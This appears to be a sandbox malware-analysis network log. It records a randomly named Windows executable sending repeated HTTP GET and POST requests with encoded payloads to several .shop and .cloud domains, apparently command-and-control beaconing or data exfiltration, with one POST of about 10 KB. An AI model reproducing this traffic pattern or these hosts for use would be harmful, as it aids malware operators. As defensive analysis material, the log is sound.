0 | 192.168.2.4 | 49743 | 104.21.10.26 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:02.134627104 CET | 423 | OUT | GET /xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.bgezakofe.shop
Connection: close
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Dec 24, 2024 11:36:03.323705912 CET | 958 | IN | HTTP/1.1 404 Not Found
Date: Tue, 24 Dec 2024 10:36:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZsQ0gaNf%2Fa1z2bvPwVStYfp19GJV5vM5uN6w3rQk08xy970kOa45GktnFXKL9h2dkmjmuHCMGVIej2lkjTXl9S149uKjFMJjqKjbkjIoU8Gew6RS2eOfA9HLxY9XuF%2BqonNmLDg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6ff2b71d3c18f6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=423&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49761 | 45.41.206.57 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 24, 2024 11:36:19.394500017 CET | 700 | OUT | POST /phws/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.techstarllc.cloud
Origin: http://www.techstarllc.cloud
Referer: http://www.techstarllc.cloud/phws/
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 39 2b 76 34 55 45 64 47 31 43 38 6d 79 69 5a 6c 78 52 56 6d 75 6a 44 34 79 62 45 45 4e 78 4f 57 35 57 2b 6f 61 49 74 68 58 49 6a 39 33 67 57 32 50 49 38 6a 76 50 6b 57 68 31 4a 54 4b 65 59 35 46 4c 50 6a 65 36 48 6a 7a 4a 30 6a 57 62 7a 49 51 62 79 48 50 36 46 63 76 32 4d 52 45 46 7a 70 30 59 38 66 2b 6a 45 61 44 2b 4a 71 48 4c 78 64 30 66 6e 61 4b 59 52 4a 4a 61 73 6b 32 34 58 77 30 4a 51 36 47 2f 2b 4f 64 66 75 6a 6c 78 32 48 6b 35 73 61 77 4b 51 55 67 6b 4e 6a 6c 6b 36 4e 6e 69 67 37 51 70 4d 33 49 7a 4a 33 57 4a 59 66 4f 53 38 46 70 51 3d 3d
Data Ascii: APatc2S=le1YadmxbCyL9+v4UEdG1C8myiZlxRVmujD4ybEENxOW5W+oaIthXIj93gW2PI8jvPkWh1JTKeY5FLPje6HjzJ0jWbzIQbyHP6Fcv2MREFzp0Y8f+jEaD+JqHLxd0fnaKYRJJask24Xw0JQ6G/+Odfujlx2Hk5sawKQUgkNjlk6Nnig7QpM3IzJ3WJYfOS8FpQ==
Dec 24, 2024 11:36:20.504039049 CET | 432 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.1
Date: Tue, 24 Dec 2024 10:36:20 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 196
Connection: close
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     2 | 192.168.2.4 | 49766 | 45.41.206.57 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:36:22.053086996 CET | 720 | OUT | POST /phws/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Origin: http://www.techstarllc.cloud
                                                                                                                    Referer: http://www.techstarllc.cloud/phws/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 38 64 48 34 5a 44 4a 47 6b 79 38 68 2b 43 5a 6c 34 78 56 36 75 6a 50 34 79 65 6b 55 4d 45 2b 57 36 33 4f 6f 64 4a 74 68 51 49 6a 39 76 51 57 33 43 6f 38 73 76 50 70 6c 68 30 31 54 4b 65 4d 35 46 50 66 6a 65 70 76 73 68 70 30 39 65 37 7a 4f 55 62 79 48 50 36 46 63 76 32 59 72 45 47 44 70 30 70 4d 66 2f 48 6f 62 63 4f 4a 70 58 62 78 64 2b 2f 6e 65 4b 59 52 33 4a 59 59 61 32 36 66 77 30 49 67 36 47 75 2b 4e 55 66 75 35 72 52 32 54 6a 62 39 69 77 70 42 43 71 6b 68 51 34 33 6d 32 72 45 74 68 42 59 74 67 61 7a 74 45 4c 4f 52 72 44 52 42 4d 79 51 57 32 71 56 4a 59 4e 64 48 56 43 57 4f 4c 30 79 4e 30 70 34 34 3d
                                                                                                                    Data Ascii: APatc2S=le1YadmxbCyL8dH4ZDJGky8h+CZl4xV6ujP4yekUME+W63OodJthQIj9vQW3Co8svPplh01TKeM5FPfjepvshp09e7zOUbyHP6Fcv2YrEGDp0pMf/HobcOJpXbxd+/neKYR3JYYa26fw0Ig6Gu+NUfu5rR2Tjb9iwpBCqkhQ43m2rEthBYtgaztELORrDRBMyQW2qVJYNdHVCWOL0yN0p44=
                                                                                                                     Dec 24, 2024 11:36:23.167867899 CET | 432 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:23 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     3 | 192.168.2.4 | 49775 | 45.41.206.57 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:36:24.709280014 CET | 10802 | OUT | POST /phws/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Origin: http://www.techstarllc.cloud
                                                                                                                    Referer: http://www.techstarllc.cloud/phws/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 6c 65 31 59 61 64 6d 78 62 43 79 4c 38 64 48 34 5a 44 4a 47 6b 79 38 68 2b 43 5a 6c 34 78 56 36 75 6a 50 34 79 65 6b 55 4d 46 71 57 35 42 61 6f 62 71 46 68 52 49 6a 39 6d 77 57 79 43 6f 38 31 76 50 77 4e 68 30 35 44 4b 63 30 35 4b 4e 58 6a 4b 49 76 73 34 5a 30 39 42 4c 7a 4c 51 62 7a 54 50 36 56 59 76 32 49 72 45 47 44 70 30 72 55 66 34 54 45 62 48 4f 4a 71 48 4c 78 52 30 66 6d 4c 4b 5a 30 4d 4a 59 64 76 31 4b 2f 77 33 6f 77 36 45 63 47 4e 57 2f 75 2f 37 42 33 55 6a 62 78 39 77 76 6c 34 71 6b 6b 59 34 77 4f 32 37 41 67 51 64 6f 39 6c 47 54 6c 5a 51 2f 4e 56 50 69 39 42 38 52 43 39 76 32 70 48 65 73 62 66 4d 30 44 4d 77 41 5a 76 77 34 49 56 53 39 33 62 4a 48 2b 57 77 6a 2b 76 73 4c 74 7a 58 72 50 58 32 47 42 78 4f 5a 2b 49 5a 7a 63 38 45 42 75 77 6b 76 4b 66 70 6d 5a 42 6e 68 52 37 34 49 36 58 70 6d 33 46 30 2f 4e 58 47 6c 45 61 67 67 5a 42 53 6d 69 6a 49 69 49 33 39 6e 46 2f 2f 49 42 46 76 42 4f 43 47 63 55 38 4f 59 59 59 45 6d 44 67 49 48 56 56 35 48 69 6f 52 39 72 4d 43 46 [TRUNCATED]
                                                                                                                     Data Ascii: APatc2S= [TRUNCATED]


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     4 | 192.168.2.4 | 49781 | 45.41.206.57 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:36:27.360234976 CET | 426 | OUT | GET /phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.techstarllc.cloud
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                     Dec 24, 2024 11:36:28.479993105 CET | 432 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.14.1
                                                                                                                    Date: Tue, 24 Dec 2024 10:36:28 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     5 | 192.168.2.4 | 49797 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:36:34.178350925 CET | 706 | OUT | POST /vupi/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Origin: http://www.hokasportshoes.shop
                                                                                                                    Referer: http://www.hokasportshoes.shop/vupi/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 32 73 4c 39 59 46 64 47 42 37 76 57 35 39 48 52 7a 52 30 78 7a 6e 68 6f 44 39 4b 41 53 55 65 56 34 38 4c 73 69 2f 50 49 51 70 37 51 61 36 4c 6a 59 69 63 4d 43 4f 61 6d 73 5a 4d 50 6f 66 6a 62 66 78 54 6e 67 45 32 78 7a 75 4d 32 73 54 6c 37 77 37 73 72 39 56 2f 5a 6f 2b 45 77 55 4c 36 61 30 33 78 48 43 57 38 63 73 32 6a 6a 6a 32 71 63 65 32 2f 73 73 31 71 61 50 6e 4e 70 78 51 61 2f 50 6b 57 2f 42 44 4c 33 38 42 59 51 75 75 75 71 67 75 72 48 62 35 48 35 6c 6c 6b 70 5a 72 34 43 72 36 47 6e 47 2f 6b 65 35 4c 49 41 66 5a 43 71 79 2b 5a 4e 67 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c2sL9YFdGB7vW59HRzR0xznhoD9KASUeV48Lsi/PIQp7Qa6LjYicMCOamsZMPofjbfxTngE2xzuM2sTl7w7sr9V/Zo+EwUL6a03xHCW8cs2jjj2qce2/ss1qaPnNpxQa/PkW/BDL38BYQuuuqgurHb5H5llkpZr4Cr6GnG/ke5LIAfZCqy+ZNgA==
                                                                                                                     Dec 24, 2024 11:36:35.259273052 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:34 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1142
                                                                                                                    x-request-id: 06108c7c-b569-463f-be63-99a5fb6e9bea
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
                                                                                                                    set-cookie: parking_session=06108c7c-b569-463f-be63-99a5fb6e9bea; expires=Tue, 24 Dec 2024 10:51:35 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                     Dec 24, 2024 11:36:35.259351969 CET | 595 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDYxMDhjN2MtYjU2OS00NjNmLWJlNjMtOTlhNWZiNmU5YmVhIiwicGFnZV90aW1lIjoxNzM1MDM2NT


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     6 | 192.168.2.4 | 49805 | 199.59.243.227 | 80 | 1228 | C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Dec 24, 2024 11:36:36.836536884 CET | 726 | OUT | POST /vupi/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.hokasportshoes.shop
                                                                                                                    Origin: http://www.hokasportshoes.shop
                                                                                                                    Referer: http://www.hokasportshoes.shop/vupi/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 65 6f 51 66 4e 52 39 7a 4d 44 37 63 30 4e 37 39 62 6d 31 47 51 4c 76 56 32 64 48 52 34 78 30 31 7a 6e 6c 6f 44 38 2b 51 53 6d 71 56 35 63 37 73 77 4f 50 49 54 70 37 51 4f 71 4c 6d 57 43 63 39 43 4f 65 45 73 61 55 50 6f 62 7a 62 66 7a 4c 6e 67 30 4b 79 70 65 4d 30 6b 7a 6c 31 74 4c 73 72 39 56 2f 5a 6f 2b 41 57 55 50 75 61 30 48 42 48 44 33 38 64 77 6d 6a 67 6b 32 71 63 4a 6d 2f 6f 73 31 71 34 50 69 78 44 78 54 69 2f 50 6c 6d 2f 42 58 6e 30 72 52 59 57 68 4f 76 4a 6e 72 57 2b 56 4d 6a 74 6e 33 49 47 5a 2f 34 52 6e 63 4c 39 58 4f 46 4a 72 4c 73 7a 43 65 4c 65 2f 39 6b 45 37 43 44 6f 56 43 4a 78 47 64 37 43 67 38 79 71 2f 61 37 58 68 6e 4d 3d
                                                                                                                    Data Ascii: APatc2S=eoQfNR9zMD7c0N79bm1GQLvV2dHR4x01znloD8+QSmqV5c7swOPITp7QOqLmWCc9COeEsaUPobzbfzLng0KypeM0kzl1tLsr9V/Zo+AWUPua0HBHD38dwmjgk2qcJm/os1q4PixDxTi/Plm/BXn0rRYWhOvJnrW+VMjtn3IGZ/4RncL9XOFJrLszCeLe/9kE7CDoVCJxGd7Cg8yq/a7XhnM=
                                                                                                                     Dec 24, 2024 11:36:37.923403978 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:36:37 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1142
                                                                                                                    x-request-id: 405346e4-09a1-4019-9550-69d99c3d8027
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==
                                                                                                                    set-cookie: parking_session=405346e4-09a1-4019-9550-69d99c3d8027; expires=Tue, 24 Dec 2024 10:51:37 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 43 61 46 31 51 45 46 58 75 30 5a 35 79 38 62 47 57 45 45 4a 72 4c 32 2b 56 50 78 47 65 32 39 76 6b 64 6f 63 49 49 6a 47 42 7a 7a 71 58 2b 71 72 30 31 6c 7a 31 6e 50 79 43 59 46 4c 53 48 51 70 53 4c 36 74 6a 32 37 33 36 34 43 47 6f 56 6f 57 32 55 6a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yCaF1QEFXu0Z5y8bGWEEJrL2+VPxGe29vkdocIIjGBzzqX+qr01lz1nPyCYFLSHQpSL6tj27364CGoVoW2UjAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
